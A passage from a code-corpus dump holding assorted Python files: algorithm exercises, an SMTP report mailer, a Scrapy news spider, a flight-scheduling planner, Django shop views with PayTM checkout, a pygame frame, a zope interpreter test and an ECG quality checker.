5]\n f = moveReversely\n moved_list = f(l, len(l), i)\n print(\"moved_list = \", moved_list)","sub_path":"src/pearls/chapter2/e4.py","file_name":"e4.py","file_ext":"py","file_size_in_byte":2519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"422830210","text":"def main():\n #input = raw_input\n for trial in range(int(input())):\n string1 = input() + 'z'\n string2 = input() + 'z'\n new_string = []\n n, m = 0, 0\n while n < len(string1) and m < len(string2):\n if string1[n:] < string2[m:]:\n new_string.append(str(string1[n]))\n n += 1\n else:\n new_string.append(str(string2[m]))\n m += 1\n new_string.pop()\n print(''.join(new_string) + ''.join(string1[n:-1]) + ''.join(string2[m:-1]))\n\nif __name__ == '__main__':\n main()","sub_path":"algorithms/strings/morgan_string/test_morgan.py","file_name":"test_morgan.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"414815945","text":"#!/usr/bin/env python\n\nimport smtplib\n\n\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\n#from email.MIMEBase import MIMEBase\nfrom email.mime import base\nfrom email import encoders\nfrom os import getcwd\nimport argparse\nimport logging\nimport sys\n#import phoneRegistration\nimport ReportDriver\nimport subprocess\n\nBODY_TEXT_FILE = \"report.html\"\n\nme = \"ccorti@cisco.com\"\nyou = [\"team-infrared-all@cisco.com\", \"satishk@cisco.com\"]\n#you = \"ccorti@cisco.com\"\n# Create message container - the correct MIME type is multipart/alternative.\n#msg = MIMEMultipart('alternative')\nmsg = MIMEMultipart()\nmsg['Subject'] = \"Morning Report: to Infrared (with audio/video packet loss spreadsheet)\"\nmsg['From'] = me\n#msg['To'] = you\nmsg['To'] = \", \".join(you)\n\n\ndef configure_logging():\n print (\"Configuring logging \\n\")\n current_path = getcwd()\n logging.basicConfig(filename=current_path + '/unregisteredPhones.log', filemode='w', level=logging.DEBUG,\n format='%(levelname)s:%(asctime)s:%(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')\n logging.info\n\ndef send_email():\n\t# Create the body of the message (a plain-text and an HTML version)\n\tf = open(BODY_TEXT_FILE, \"r\")\n\tbody = f.read()\n\t# Attach text or html file\n\tpart = base.MIMEBase('application', \"octet-stream\")\n\t#part.set_payload(open(\"junkb.txt\", \"rb\").read())\n\tpart.set_payload(open(\"registered.txt\", \"rb\").read())\n\tencoders.encode_base64(part)\n\n\t#part.add_header('Content-Disposition', 'attachment; filename=\"text.txt\"') # any filename\n\t# still text\n\tpart.add_header('Content-Disposition', 'attachment; filename=\"registered.txt\"') # any filename\n\tmsg.attach(part)\n\n\tpart1 = base.MIMEBase('application', \"octet-stream\")\n\tpart1.set_payload(open(\"unregistered.txt\", \"rb\").read())\n\tencoders.encode_base64(part1)\n\tpart1.add_header('Content-Disposition', 'attachment; filename=\"unregistered.txt\"') # any filename\n\t# Record the MIME types of both parts - text/plain and text/html.\n\t#part1 = MIMEText(text, 'plain')\n\t#part2 = MIMEText(html, 'html')\n\n\t# Attach parts into message container.\n\t# According to RFC 2046, the last part of a multipart message, in this case\n\t# the HTML message, is best and preferred.\n\t#print (\"attaching part 1\")\n\tmsg.attach(part1)\n\t#msg.attach(part2)\n\n\t##################################################\n\t# Try sending xls attachment\n\t##################################################\n\tfp = open('packetLossToday.xls', 'rb')\n\tfile1=base.MIMEBase('application', 'vnc.ms-excel')\n\tfile1.set_payload(fp.read())\n\tfp.close()\n\tencoders.encode_base64(file1)\n\tfile1.add_header('Content-Disposition', 'attachment; filename=packetLoss.xls')\n\tmsg.attach(file1)\n\n\n\n\tmsg.attach(MIMEText(body, 'html'))\n\t# Send the message via local SMTP server.\n\ts = smtplib.SMTP('mail.cisco.com', 25)\n\t# sendmail function takes 3 arguments: sender's address, recipient's address\n\t# and message to send - here it is sent as one string.\n\ts.sendmail(me, you, msg.as_string())\n\ts.quit()\n\n\ndef main(argv): \n\n configure_logging()\n parser = argparse.ArgumentParser()\n parser.add_argument(\"json\", help=\"JSON File To Parse (including path)\")\n argv = parser.parse_args()\n if (argv.json):\n fname = argv.json\n #print (\"json file {}\".format(fname))\n #query = phoneRegistration.read_in_query(fname)\n else:\n print(\"Provide the json file containing a query string\")\n sys.exit()\n \n #phoneRegistration.reg_and_unreg(query)\n #phoneRegistration.add_header_to_report()\n #phoneRegistration.collect_reg_stats()\n #r = ReportDriver.ReportDriver().main(fname)\n\n send_email()\n\nif __name__ == '__main__':\n main(sys.argv[1:])\n","sub_path":"dev-ops/src/util/stats/emailTool.py","file_name":"emailTool.py","file_ext":"py","file_size_in_byte":3650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"77992059","text":"def _bigger(x, y):\n # Retorna o indice do maior valor entre \"x\" e \"y\"\n\n return 0 if x > y else 1\n\n\ndef _vote(x, y, database):\n # Manipila a database, incerindo o voto\n\n y *= 2\n database[x + y] += 1\n\n\ndef findNE(M):\n # A entrada de M deve ser uma lista ou tupula\n # Ex.: [[[a, b], [c, d]],\n # [[e, f], [g, h]]]\n # Onde teremos M[x][y][z]\n # x = linha y = coluna z = elemento (Player 1, ou 2)\n #\n # Em python se começa contar o 0.\n\n # possiveis jogadas em uma matrix 2x2\n\n jogada = {0: [0, 0], 1: [0, 1], 2: [1, 0], 3: [1, 1]}\n\n # votos em cada possivel jogada\n\n votos = [0, 0, 0, 0]\n\n p1_1 = _bigger(M[0][0][0], M[1][0][0])\n p1_2 = _bigger(M[0][1][0], M[1][1][0])\n _vote(p1_1, 0, votos)\n _vote(p1_2, 1, votos)\n\n p2_1 = _bigger(M[0][0][1], M[0][1][1])\n p2_2 = _bigger(M[1][0][1], M[1][1][1])\n _vote(0, p2_1, votos)\n _vote(1, p2_2, votos)\n\n # Jogada decidida\n\n ne = jogada[votos.index(max(votos))]\n\n x = ne[0]\n y = ne[1]\n\n # valor da jogada decidida\n\n nev = M[x][y]\n\n return ne, nev\n\n\ndef findmixedNE(M):\n # Variables :\n\n a = M[0][0][0]\n b = M[0][0][1]\n c = M[0][1][0]\n d = M[0][1][1]\n e = M[1][0][0]\n f = M[1][0][1]\n g = M[1][1][0]\n h = M[1][1][1]\n\n # Basic expression's variables\n\n sigma_up = (h - f) / (b + h - f - d)\n sigma_down = 1 - sigma_up\n\n sigma_left = (g - h) / (a + g - c - e)\n sigma_right = 1 - sigma_left\n\n payoff_probability = [[sigma_up * sigma_left, sigma_up * sigma_right],\n [sigma_down * sigma_left, sigma_down * sigma_right]]\n\n sigmas = [[sigma_up, sigma_down], [sigma_left, sigma_right]]\n\n # Output's\n\n pp = payoff_probability\n payoff = [[[pp[0][0] * a, pp[0][0] * b], [pp[0][1] * c, pp[0][1] * d]],\n [[pp[1][0] * e, pp[1][0] * f], [pp[1][1] * g, pp[1][1] * h]]]\n\n ne = sigmas\n nev = payoff\n\n return ne, nev\n","sub_path":"old/v_0.1/exercise/exercicio.py","file_name":"exercicio.py","file_ext":"py","file_size_in_byte":1939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"508618445","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom sinaNews.items import SinanewsItem\nimport json\nfrom scrapy_splash import SplashRequest\n\n\nclass NewsSpider(scrapy.Spider):\n name = 'news'\n allowed_domains = []\n #start_urls = ['http://news.sina.com.cn/guide/']\n start_urls = ['http://feed.mix.sina.com.cn/api/roll/get?pageid=107&lid=1244&num=30&page=']\n def start_requests(self):\n for count in range(3):\n yield scrapy.Request(self.start_urls[0]+str(count+1), callback=self.parse)\n print(self.start_urls[0]+str(count+1))\n\n def parse(self, response):\n data = json.loads(response.body)\n for each in data['result']['data']:\n #yield scrapy.Request(each['url'], callback=self.article_item)\n yield SplashRequest(each['url'], self.article_item, args={'wait': 0.5})\n\n def article_item(self,response):\n item = SinanewsItem()\n item['article_url'] = response.url\n item['title'] = response.xpath(\"//h1/text()\").extract()[0]\n item['simple'] = response.xpath(\"//div[@class='quotation']//p/text()\").extract()[0]\n item['conment'] = response.xpath(\"//div[@class='article']//p/text()\").extract()[0]\n yield item","sub_path":"sinaNews/spiders/news.py","file_name":"news.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"564717598","text":"'''\nV3 版本的航线规划\n处理的仍然是2维坐标\nv2的主要问题就是无法跳出死循环,以及无法避免死循环的解所造成的影响\n\nV3 的目标是将求解过程进行优化\n需要解决一下问题\n1. 对于给定的路线,能够产生出所有的线路规划集合\n2. 优化算法,以适应新的三维坐标模式\n3. 利用 idea 中的想法实现,保证动然三维最短路径同时起飞航线规划\n'''\n\nimport pickle\nfrom airWayV2 import MyMathTools, AirPlane, AirWay\nimport random\nimport matplotlib.pyplot as plt\nimport copy\n\n\n# def plot_view(air_plan_list):\n#\n# for item in air_plan_list:\n#\n# plt.plot(item.Up, item.Down)\n#\n# plt.show()\n\n\nclass AirPlanPlus:\n def __init__(self):\n # 用于存储在给定的航班信息下的所有可能的航班起飞时间集合\n self.air_plan_list = []\n\n # 将当前的航班 now_air 和 exist_air_list 进行对比,看是否满足安全起飞条件\n # 同时,会对当前航班进行处理,但是又会符合一定的限制(如:起飞时间不能超过多少分钟)\n # todo:搞清楚 pyhon 如何修改传递值 如果不可以,对函数进行返回值改造\n def if_safe_up(self, now_air, exist_air_list, time_limit=100000):\n\n '''\n 判断当前航班能否在已有的条件下起飞,如果可以,返回True,否则,返回False\n 同时如果满足起飞限制,此函数会对航班的起飞时间进行修改\n\n :param now_air: 当前航班\n :param exist_air_list: 已经存在的航班限制��表\n :param time_limit: 时间限制\n :return: True表示满足条件,可以加入, False 表示不满足条件,不可以加入航班计划\n '''\n\n air = now_air\n\n # 对于每一个元素,对比三种限制,满足可以加入, 不满足则不可以加入\n # 同时,总体起飞时间限制在 time_limit 分钟内\n for item in exist_air_list:\n\n ifcorrect = False\n\n while not ifcorrect and air.upTime <= time_limit:\n # if nextWay.ifCrossSafe(item):\n # print('cross safe')\n # if nextWay.sameUpPointCheck(item):\n # print('up correct')\n # if nextWay.sameDownPointCheck(item):\n\n if air.ifCrossSafe(item):\n if air.sameUpPointCheck(item):\n if air.sameDownPointCheck(item):\n ifcorrect = True\n\n if not ifcorrect:\n air.upTime += 0.5\n # count += 1\n\n if air.upTime > time_limit:\n air.upTime = 0\n return -1\n\n return now_air.upTime\n\n def air_plan_of_2d(self, air_list, exist_air):\n '''\n 递归方法: 基于已有的航班序列进行判断\n\n 算法思路:\n 首先随机选择一个航班,然后判断它是否能够安全起飞,如果可以,则加入当前的航班列表,并递归此流程\n 否则,将整个列表删除(因为在此序列下无法产生有效的序列)\n\n :param air_list: 已有的航班序列\n :param exist_air: 未指派的航班序列\n :return:\n '''\n\n # air_plan = []\n\n # todo:保证算法已经穷尽了以 root_air 为起飞基准点的所有的可能\n # 解决方法1 : 设计一个迭代算法,使得算法能够满足所有需求\n\n # 随机选择一个初始起飞点, 也可以自己指派\n if len(air_list) > 0:\n root_air = random.choice(air_list)\n air_list.remove(root_air)\n # air_list.remove(root_air)\n else:\n # print('error in this ')\n return False\n\n # print('now root air is :')\n # print(root_air.Up)\n # print(root_air.Down)\n\n # 输出\n # -----------------------------------------------\n # plan_num = 'the plan is :'\n # print('--------------------------------------------------------')\n # print(plan_num)\n #\n # for item in exist_air:\n # air_str = str(item.UpName) + ' to ' + str(item.DownName) + ':' + str(item.upTime)\n # print(air_str)\n #\n # self.air_plan_list.append(exist_air)\n # print('-------------------------------------------------------')\n # ------------------------------------------------\n\n # root_air = air_list[0]\n\n\n # todo: 保证航路的运行\n # todo: 保证 exist_air 的初始化\n # exist_air = []\n # exist_air.append(_air)\n\n # todo:如果有多种可以选择的方向,如何处理\n\n # 递归解决问题:\n # 如果没有航班未指派,那么判断当前航班能否加入航班计划,\n # 若能,加入,并且结束递归,否则,消除当前计划,并且结束递归\n # 如果有航班未指派,那么顺序选择航班,,如果满足条件,将余下的列表进入递归流程\n # 否则此方法不同,不进入递归流程\n\n # 构造函数,判断当前航班能否在限制条件下起飞\n # print('run this')\n if len(air_list) == 0: # 当余下的航班为0时,如果当前航班可以,则加入航班计划,否则清空序列\n\n time = self.if_safe_up(root_air, exist_air)\n if time == -1:\n del air_list, exist_air\n return False\n else:\n # root_air = self.if_safe_up(root_air, exist_air)\n root_air.upTime = time\n exist_air.append(root_air)\n\n # 输出\n # -----------------------------------------------\n plan_num = 'the plan is :'\n print(plan_num)\n\n\n plt.axis([0, 200, 0, 250])\n\n for item in exist_air:\n air_str = item.UpName + ' to ' + item.DownName + ':' + str(item.upTime)\n plt.plot([item.Up[0], item.Down[0]], [item.Up[1], item.Down[1]])\n plt.text(item.Up[0], item.Up[1], item.upTime)\n print(air_str)\n\n plt.show()\n\n\n print('------------------------------------------------------')\n\n return True\n # self.air_plan_list.append(exist_air)\n # ------------------------------------------------\n\n # print('run good')\n\n else: # 当前的航班不为0 ,如果当前的航班可以,则加入序列,继续递归过程,否则,清空序列,结束当前线路\n time = self.if_safe_up(root_air, exist_air)\n if time == -1:\n\n # print(self.if_safe_up(root_air, exist_air))\n\n del air_list, exist_air\n return False\n else:\n\n # print(self.if_safe_up(root_air, exist_air))\n # root_air = self.if_safe_up(root_air, exist_air)\n\n root_air.upTime = time\n exist_air.append(root_air)\n self.air_plan_of_2d(air_list, exist_air)\n\nif __name__ == \"__main__\":\n\n # 生成航班信息 并且返回起飞 降落点信息\n # airWay, airUpPoint, airDownPoint = AirWay.randomDiffAirWay()\n airWay, airUpPoint, airDownPoint = AirWay.easyAirWay()\n\n # 航线输出\n # print(airWay)\n # print(airUpPoint)\n # print(airDownPoint)\n\n # 画图\n # for i in range(0, 24):\n # plt. (airUpPoint[airWay[i][0]], airUpPoint[airWay[i][1]])\n\n\n # 将所有的航班信息进行赋值, 生成航班列表\n # airList = []\n # for item in airWay:\n # for i in range(1, 3):\n\n # print(airUpPoint[item[0]])\n # print(airDownPoint[item[1]])\n\n # air = AirPlane(airNum=i, UpPoint=airUpPoint[item[0]], DownPoint=airDownPoint[item[1]], UpPointName=item[0], DownPointName=item[1], uptime=0)\n\n # print(air.number)\n # print(air.Up)\n # print(air.Down)\n # print(air.UpName)\n # print(air.DownName)\n # print(air.upTime)\n\n # airList.append(air)\n\n # 简化,只设置12条航班\n simp_air_list = []\n for item in airWay:\n # print(airUpPoint[item[0]])\n # print(airDownPoint[item[1]])\n air = AirPlane(airNum=0, UpPoint=airUpPoint[item[0]], DownPoint=airDownPoint[item[1]], UpPointName=item[0],\n DownPointName=item[1], uptime=0)\n # print(air.number)\n # print(air.Up)\n # print(air.Down)\n # print(air.UpName)\n # print(air.DownName)\n # print(air.upTime)\n\n simp_air_list.append(air)\n\n # for air in airList:\n # print(air.Up)\n # print(air.Down)\n\n # print(airList)\n\n air_plan_plus = AirPlanPlus()\n\n # 所有方法递归\n count = 0\n for i in range(1, 100000):\n\n air_list = simp_air_list.copy()\n\n for item in air_list:\n item.upTime = 0\n\n # print(len(air_list))\n air_plan_plus.air_plan_of_2d(air_list, [])\n # print('error route')\n count += 1\n\n # 进行图像化输出\n # air_plan_list = air_plan_plus.air_plan_list\n\n # print(air_plan_list)\n\n # count = 1\n # for plan_list in air_plan_list:\n #\n # plan_num = 'the plan No.' + count + 'is :'\n # print(plan_num)\n # count += 1\n #\n # for item in plan_list:\n # air_str = item.UpName + ' to ' + item.DownName + ':' + item.upTime\n # print(air_str)\n","sub_path":"airWayV3.py","file_name":"airWayV3.py","file_ext":"py","file_size_in_byte":9578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"367944589","text":"import json\n\nfrom django.http import HttpResponse\nfrom django.shortcuts import render\nfrom .models import Product, Contact, Order, OrderTracker\nfrom math import ceil\n# for paytm exempting csrf\nfrom django.views.decorators.csrf import csrf_exempt\nfrom PayTM import Checksum\n\nMERCHANT_KEY = 'kbzk1DSbJiV_O3p5'\n\n# Create your views here.\n\ndef index(request):\n \"\"\"As we'll show 4 images in one carousel\n Doing int division of total_products by 4 and then adding the remaining products\n that is suppose I have 6 products\n then 6//4 = 1\n ceil(6/4) = 2\n - total_products//4 = 1\n 1 + (2 - 1) = 2 slides\"\"\"\n # my_products = Product.objects.all()\n # total_products = len(my_products)\n # total_slides = total_products // 4 + (ceil(total_products / 4) - total_products // 4)\n\n # products = {\"product\": my_products, \"range\": range(1, total_slides, \"no_of_slides\": total_slides )}\n\n # allProducts = [[my_products, range(1, total_slides), total_slides],\n # [my_products, range(1, total_slides), total_slides]]\n\n allProducts = []\n\n # Fetching all product categories\n prod_categories = Product.objects.values('product_category', 'id')\n\n # adding unique product categories in set - categories\n categories = {item['product_category'] for item in prod_categories}\n\n # Iterating through each category and appending to allProdcuts\n for category in categories:\n product = Product.objects.filter(product_category=category)\n total_products = len(product)\n total_slides = total_products // 4 + (ceil(total_products / 4) - total_products // 4)\n allProducts.append([product, range(1, total_slides), total_slides])\n\n products = {'allProducts': allProducts}\n\n return render(request=request, template_name=\"shop/index.html\", context=products)\n\n\ndef about(request):\n return render(request=request, template_name=\"shop/about.html\")\n\n\ndef contact(request):\n if request.method == \"POST\":\n name = request.POST.get('name', '')\n email = request.POST.get('email', '')\n phone = request.POST.get('phone', '')\n query = request.POST.get('query', '')\n\n contact = Contact(contact_name=name, contact_email=email, contact_phone=phone, contact_description=query)\n contact.save()\n success = True\n return render(request=request, template_name=\"shop/contact.html\", context={'success': success})\n\n return render(request=request, template_name=\"shop/contact.html\")\n\n\ndef tracker(request):\n if request.method == \"POST\":\n order_id = request.POST.get('orderId', '')\n email = request.POST.get('email', '')\n\n try:\n # If such order exists\n order = Order.objects.filter(order_id=order_id, order_email=email)\n if len(order) > 0:\n # Get the updates\n order_update = OrderTracker.objects.filter(order_id=order_id)\n updates = []\n\n # Appends updates and return the response in JSON form\n for item in order_update:\n updates.append({'desc': item.track_desc, 'time': item.track_timestamp.strftime(\"%d %B, %Y\")})\n response = json.dumps([updates, order[0].order_items], default=str)\n return HttpResponse(response)\n else:\n return HttpResponse('{}')\n\n except Exception as e:\n return HttpResponse('{}')\n return render(request=request, template_name=\"shop/tracker.html\")\n\n\ndef search(request):\n return render(request=request, template_name=\"shop/search.html\")\n\n\ndef viewproduct(request, vid):\n product = Product.objects.filter(id=vid)\n return render(request=request, template_name=\"shop/viewproduct.html\", context={'product': product[0]})\n\n\ndef checkout(request):\n if request.method == \"POST\":\n name = request.POST.get('name', '')\n email = request.POST.get('email', '')\n add = request.POST.get('add1', '') + \" \" + request.POST.get('add2', '')\n phone = request.POST.get('phone', '')\n city = request.POST.get('city', '')\n state = request.POST.get('state', '')\n pincode = request.POST.get('pincode', '')\n items = request.POST.get('jsonItems', '')\n amount = request.POST.get('amount', '')\n\n order = Order(order_name=name, order_email=email, order_add=add, order_phone=phone,\n order_city=city, order_state=state, order_pincode=pincode, order_items=items, order_amount=amount)\n order.save()\n oid = order.order_id\n order_status = True\n\n track = OrderTracker(order_id=oid, track_desc=\"The order has been placed successfully!\")\n track.save()\n # return render(request=request, template_name=\"shop/checkout.html\",\n # context={'order_status': order_status, 'id': oid})\n\n # Request paytm to transfer amount to your account after user pays it\n\n param_dict = {\n 'MID': 'WorldP64425807474247',\n 'ORDER_ID': str(order.order_id),\n 'TXN_AMOUNT': str(amount),\n 'CUST_ID': email,\n 'INDUSTRY_TYPE_ID': 'Retail',\n 'WEBSITE': 'WEBSTAGING',\n 'CHANNEL_ID': 'WEB',\n 'CALLBACK_URL': 'http://127.0.0.1:8000/shop/handlerequest/',\n }\n param_dict['CHECKSUMHASH'] = Checksum.generate_checksum(param_dict, MERCHANT_KEY)\n\n return render(request, 'shop/paytm.html', {'param_dict': param_dict})\n\n return render(request=request, template_name=\"shop/checkout.html\")\n\n\n@csrf_exempt\ndef handlerequest(request):\n # paytm will send us request here\n form = request.POST\n response_dict = {}\n for i in form.keys():\n response_dict[i] = form[i]\n if i == 'CHECKSUMHASH':\n checksum = form[i]\n verify = Checksum.verify_checksum(response_dict, MERCHANT_KEY, checksum)\n if verify:\n if response_dict['RESPCODE'] == '01':\n print('Order Successful')\n else:\n print('Order was not successful because ' + response_dict['RESPMSG'])\n return render(request, 'shop/paymentstatus.html', {'response': response_dict})\n","sub_path":"mac/shop/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"107278239","text":"import pygame,sys\nimport web_client\nfrom menu_view import MenuView\n\nclass MainFrame:\n\t# Constants\n\tSCREEN_SIZE = (800,600)\n\tBG_COLOR = (255,255,255)\n\n\tdef __init__(self):\n\t\tpygame.init()\n\t\tself.screen = pygame.display.set_mode(self.SCREEN_SIZE)\n\t\tself.clock = pygame.time.Clock()\n\t\tself.elements = []\n\n\t\tself.user = web_client.login(\"kymani37299\",\"some_pass\")\n\t\tself.view = MenuView(self.user)\n\t\tself.elements.append(self.view)\n\t\t\n\n\tdef run(self):\n\t\twhile 1:\n\t\t\tself.handle_events()\n\t\t\tself.refresh_frame()\n\t\t\tself.clock.tick(60)\n\n\tdef handle_events(self):\n\t\tfor event in pygame.event.get():\n\t\t\t\tif(event.type == pygame.QUIT):\n\t\t\t\t\tsys.exit()\n\t\t\t\tfor element in self.elements:\n\t\t\t\t\tfor action in element.get_actions():\n\t\t\t\t\t\tif(action.condition(event)):\n\t\t\t\t\t\t\taction.handle()\n\n\tdef refresh_frame(self):\n\t\tself.screen.fill(self.BG_COLOR)\n\t\t#Draw layers\n\t\tfor element in self.elements:\n\t\t\telement.draw(self.screen)\n\t\tpygame.display.flip()\n\n\nif __name__ == \"__main__\":\n\tMainFrame().run()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"587187749","text":"##############################################################################\n#\n# Copyright (c) 2003 Zope Corporation and Contributors.\n# All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE.\n#\n##############################################################################\nimport unittest\n\nfrom zope.security.interpreter import RestrictedInterpreter\nfrom zope.security.checker import defineChecker\n\nfrom zope.testing.cleanup import CleanUp\n\nclass RITests(unittest.TestCase, CleanUp):\n\n def setUp(self):\n CleanUp.setUp(self)\n self.rinterp = RestrictedInterpreter()\n\n def tearDown(self):\n CleanUp.tearDown(self)\n\n def testExec(self):\n self.rinterp.ri_exec(\"str(type(1))\\n\")\n\n def testImport(self):\n self.rinterp.ri_exec(\"import zope.security.proxy\")\n\n def testWrapping(self):\n # make sure we've really got proxies\n import types\n from zope.security.checker import NamesChecker\n\n checker = NamesChecker(['Proxy'])\n\n import zope.security.proxy\n defineChecker(zope.security.proxy, checker)\n\n checker = NamesChecker(['BuiltinFunctionType'])\n defineChecker(types, checker)\n\n code = (\"from zope.security.proxy import Proxy\\n\"\n \"import types\\n\"\n \"assert type(id) is not types.BuiltinFunctionType\\n\"\n )\n self.rinterp.ri_exec(code)\n\n def testGlobalVersusLocal(self):\n code = (\"global x\\n\"\n \"x = 1\\n\"\n \"y = 2\\n\")\n self.rinterp.ri_exec(code)\n self.assert_('x' in self.rinterp.globals)\n self.assert_('y' not in self.rinterp.globals)\n self.assertEqual(self.rinterp.globals['x'], 1)\n self.assert_('x' not in self.rinterp.locals)\n self.assert_('y' in self.rinterp.locals)\n self.assertEqual(self.rinterp.locals['y'], 2)\n\n\ndef test_suite():\n return unittest.makeSuite(RITests)\n\n\nif __name__=='__main__':\n from unittest import main\n main(defaultTest='test_suite')\n","sub_path":"Zope3/tags/ZopeInterface-3.0.0b1/src/zope/security/tests/test_interpreter.py","file_name":"test_interpreter.py","file_ext":"py","file_size_in_byte":2370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"644138767","text":"\"\"\"\r\nauthor: Varun Rajiv Mantri\r\n\"\"\"\r\n\r\nfrom matplotlib import pyplot as plt\r\n\r\n\r\ndef file_reader(file_name):\r\n '''\r\n This method reads in the data from a csv file\r\n :param file_name:name of the input file\r\n :return:\r\n '''\r\n complete_data = []\r\n with open(file_name) as file:\r\n for row in file:\r\n row = row.strip()\r\n row = row.split(\",\")\r\n complete_data.append(row)\r\n return complete_data\r\n\r\n\r\ndef peak_finder(row, mean):\r\n '''\r\n This method finds the peaks\r\n :param row: record under consideration\r\n :param mean: mean value for that record\r\n :return: peaks\r\n '''\r\n peaks = []\r\n previous = abs(float(row[0]))\r\n current = abs(float(row[1]))\r\n next_item = abs(float(row[2]))\r\n biggest_peak = 0\r\n for index in range(3, len(row) - 1):\r\n if current > previous and current > next_item and current > (mean + 5):\r\n peaks.append(index)\r\n previous = current\r\n current = abs(float(row[index]))\r\n if current > biggest_peak:\r\n biggest_peak = current\r\n next_item = abs(float(row[index + 1]))\r\n return peaks, biggest_peak\r\n\r\n\r\ndef mean_calculator(row):\r\n mean = 0\r\n for value in row:\r\n mean = mean + float(value)\r\n mean = round(mean / len(row), 3)\r\n return mean\r\n\r\n\r\ndef rejection_condition_two(row):\r\n '''\r\n This method looks for peaks and counts only those peaks that have sudden falls at precisely same location\r\n across more than 5 leads\r\n :param complete_data: Complete input data\r\n :return: Bad data list\r\n '''\r\n lower_limit = 0\r\n upper_limit = 100\r\n leads = 0\r\n location_recorder = [False for _ in range(12)]\r\n index_recorder = [False for _ in range(12)]\r\n while leads < 12:\r\n max_peak = float(\"-inf\")\r\n for index in range(lower_limit, upper_limit):\r\n if float(row[index]) > max_peak:\r\n max_peak = float(row[index])\r\n location = index\r\n lower_limit = upper_limit\r\n upper_limit = upper_limit + 100\r\n\r\n mean = mean_calculator(row)\r\n # checking if the next value is the biggest\r\n if location + 1 < 1200:\r\n if float(row[location + 1]) < (mean + 5):\r\n location_recorder[leads] = True\r\n index_recorder[leads] = location - lower_limit\r\n if location - 1 >= 0:\r\n if float(row[location - 1]) < (mean + 5):\r\n location_recorder[leads] = True\r\n index_recorder[leads] = location - lower_limit\r\n leads = leads + 1\r\n max_count = 0\r\n for index in range(len(index_recorder) - 1):\r\n current = index_recorder[index]\r\n counter = 0\r\n for index_1 in range(index, len(index_recorder)):\r\n if current == index_recorder[index_1]:\r\n counter = counter + 1\r\n if max_count < counter:\r\n max_count = counter\r\n value = current\r\n counter = 0\r\n for index in range(len(index_recorder)):\r\n if index_recorder[index] == value:\r\n if location_recorder[index] == True:\r\n counter = counter + 1\r\n if counter >= 5:\r\n return True\r\n return False\r\n\r\n\r\ndef rejection_condition_one(row):\r\n '''\r\n This method rejects the records\r\n :param complete_data:\r\n :return: correct and incorrect records list\r\n '''\r\n flag = False\r\n mean = 0\r\n for value in row:\r\n mean = mean + float(value)\r\n mean = round(mean / len(row), 3)\r\n count = 0\r\n upper_limit = 100\r\n lower_limit = 0\r\n # finding peaks\r\n peaks, biggest_peak = peak_finder(row, mean)\r\n mid_value = (mean + biggest_peak) / 2\r\n while (count < 12):\r\n for i in range(lower_limit, lower_limit + 9):\r\n # cheking first five\r\n if abs(float(row[i])) >= mean + mid_value:\r\n flag = True\r\n break\r\n for i in range(upper_limit - 1, upper_limit - 10, -1):\r\n # cheking first five\r\n # print(upper_limit)\r\n if abs(float(row[i])) >= mean + mid_value:\r\n flag = True\r\n break\r\n if flag == True:\r\n break\r\n count = count + 1\r\n lower_limit = upper_limit\r\n upper_limit = upper_limit + 100\r\n for index in peaks:\r\n if round(float(row[index + 1])) == 0:\r\n flag = True\r\n elif round(float(row[index - 1])) == 0:\r\n flag = True\r\n if flag == True:\r\n return True\r\n return False\r\n\r\n\r\ndef plotter(data, fig):\r\n lower_limit = 0\r\n upper_limit = 100\r\n figure_count = 1\r\n plt.figure(fig)\r\n row = 1\r\n col = 1\r\n for _ in range(12):\r\n temp = []\r\n for index in range(lower_limit, upper_limit):\r\n temp.append(float(data[index]))\r\n plt.subplot(4, 3, figure_count)\r\n plt.plot(temp)\r\n plt.title(\"Lead\" + str(figure_count))\r\n lower_limit = upper_limit\r\n upper_limit = upper_limit + 100\r\n figure_count = figure_count + 1\r\n\r\n\r\ndef combine(incorrect_record_list, bad_list):\r\n dicto = {}\r\n for item in incorrect_record_list:\r\n dicto[item] = True\r\n for item in bad_list:\r\n if item not in dicto.keys():\r\n dicto[item] = True\r\n complete_list = []\r\n for item in dicto.keys():\r\n complete_list.append(item)\r\n return complete_list\r\n\r\n\r\ndef check_quality(record):\r\n status = rejection_condition_one(record)\r\n if status == False:\r\n status = rejection_condition_two(record)\r\n if status == False:\r\n return 'good'\r\n else:\r\n return 'bad'\r\n\r\n\r\n'''\r\ndef main():\r\n complete_data=file_reader(\"train_x.csv\")\r\n check_quality(record)\r\n incorrect_record_list,correct_records=rejection_condition_one(complete_data)\r\n bad_list=rejection_condition_two(complete_data)\r\n incorrect_record_list=combine(incorrect_record_list,bad_list)\r\n print(\"-----------------------------------\")\r\n print(\"Incorrect record ID's: \")\r\n print(incorrect_record_list)\r\n print(\"Correct record ID's:\")\r\n print(correct_records)\r\n print(\"\\n\\nPercentage of records that are wrong:\"+str(round((len(incorrect_record_list)/len(complete_data))*100,3))+\"%\")\r\n 